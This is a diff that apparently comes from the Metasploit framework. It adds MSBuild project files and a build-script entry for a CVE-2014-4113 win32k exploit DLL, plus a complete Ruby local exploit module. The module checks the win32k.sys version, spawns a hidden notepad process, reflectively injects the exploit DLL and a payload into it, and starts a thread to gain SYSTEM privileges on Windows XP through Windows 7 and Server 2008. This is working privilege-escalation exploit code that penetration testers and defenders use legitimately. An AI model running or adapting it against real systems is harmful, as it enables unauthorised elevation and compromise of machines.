</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<CompileAs>CompileAsC</CompileAs>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<CompileAs>CompileAsC</CompileAs>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<CompileAs>CompileAsC</CompileAs>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<CompileAs>Default</CompileAs>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<CompileAs>CompileAsC</CompileAs>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<CompileAs>Default</CompileAs>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="cve-2014-4113.c" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,17 @@
|
|||
<?xml version="1.0" standalone="yes"?>
|
||||
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
|
||||
</PropertyGroup>
|
||||
|
||||
<Target Name="all" DependsOnTargets="x86" />
|
||||
|
||||
<Target Name="x86">
|
||||
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
|
||||
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||
</Target>
|
||||
|
||||
<Target Name="x64">
|
||||
<Message Text="CVE-2014-4113 is not supported in x64" />
|
||||
</Target>
|
||||
</Project>
|
|
@ -47,6 +47,13 @@ IF "%ERRORLEVEL%"=="0" (
|
|||
POPD
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building CVE-2014-4113 (win32k_null_page)"
|
||||
PUSHD CVE-2014-4113
|
||||
msbuild.exe make.msbuild /target:%PLAT%
|
||||
POPD
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building CVE-2013-1300 (schlamperei)"
|
||||
PUSHD CVE-2013-1300
|
||||
|
@ -60,8 +67,8 @@ IF "%ERRORLEVEL%"=="0" (
|
|||
msbuild.exe make.msbuild /target:%PLAT%
|
||||
POPD
|
||||
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building bypassuac (in-memory)"
|
||||
PUSHD bypassuac_injection
|
||||
|
@ -69,8 +76,8 @@ IF "%ERRORLEVEL%"=="0" (
|
|||
POPD
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building IE11 Sandbox bypasses"
|
||||
PUSHD IE11SandboxEscapes
|
||||
|
|
|
@ -0,0 +1,158 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/windows/reflective_dll_injection'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
|
||||
'Description' => %q{
|
||||
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
|
||||
can be triggered through the use of TrackPopupMenu. Under special conditions, the
|
||||
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
|
||||
code execution. This module has been tested successfully on Windows XP SP3, Windows
|
||||
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
|
||||
2008 R2 SP1 64 bits.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # vulnerability discovery and exploit in the wild
|
||||
'juan vazquez', # msf module (x86 target)
|
||||
'Spencer McIntyre' # msf module (x64 target)
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested on (32 bits):
|
||||
# * Windows XP SP3
|
||||
# * Windows 2003 SP2
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
# Tested on (64 bits):
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008 R2 SP1
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-4113'],
|
||||
['OSVDB', '113167'],
|
||||
['BID', '70364'],
|
||||
['MSB', 'MS14-058'],
|
||||
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 14 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
end
|
||||
|
||||
def check
|
||||
os = sysinfo["OS"]
|
||||
|
||||
if os !~ /windows/i
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /(wow|x)64/i
|
||||
arch = ARCH_X86_64
|
||||
elsif sysinfo["Architecture"] =~ /x86/i
|
||||
arch = ARCH_X86
|
||||
end
|
||||
|
||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
||||
|
||||
# Neither target suports Windows 8 or 8.1
|
||||
return Exploit::CheckCode::Safe if build == 9200
|
||||
return Exploit::CheckCode::Safe if build == 9600
|
||||
|
||||
if arch == ARCH_X86
|
||||
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
|
||||
else
|
||||
return Exploit::CheckCode::Detected if build == 7601
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
if is_system?
|
||||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if check == Exploit::CheckCode::Safe
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
|
||||
begin
|
||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
# Reader Sandbox won't allow to create a new process:
|
||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
print_status('Operation failed. Trying to elevate the current process...')
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
if target.arch.first == ARCH_X86
|
||||
dll_file_name = 'cve-2014-4113.x86.dll'
|
||||
else
|
||||
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||
end
|
||||
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status('Payload injected. Executing exploit...')
|
||||
process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue